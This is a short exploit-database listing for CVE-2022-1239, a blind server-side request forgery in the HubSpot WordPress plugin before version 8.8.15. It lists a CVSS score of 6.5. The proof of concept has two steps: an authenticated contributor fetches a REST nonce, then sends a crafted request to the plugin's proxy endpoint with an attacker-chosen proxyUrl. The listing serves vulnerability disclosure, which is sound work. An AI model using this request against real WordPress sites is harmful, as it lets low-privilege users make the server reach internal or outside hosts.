Exploit for HubSpot < 8.8.15 - Contributor+ Blind SSRF CVE-2022-1239

Name: Exploit for HubSpot < 8.8.15 - Contributor+ Blind SSRF CVE-2022-1239
Rating: 5 (67 reviews)

2022-04-11 | CVSS 6.5

## https://sploitus.com/exploit?id=WPEX-ID:4AD2BB96-87A4-4590-A058-B03B33D2FCEE
As an authenticated user with the edit_posts capability, get REST nonce via https://example.com/wp-admin/admin-ajax.php?action=rest-nonce

https://example.com/wp-json/leadin/v1/proxy?proxyUrl=@domain.com&_wpnonce=8aaf916bd9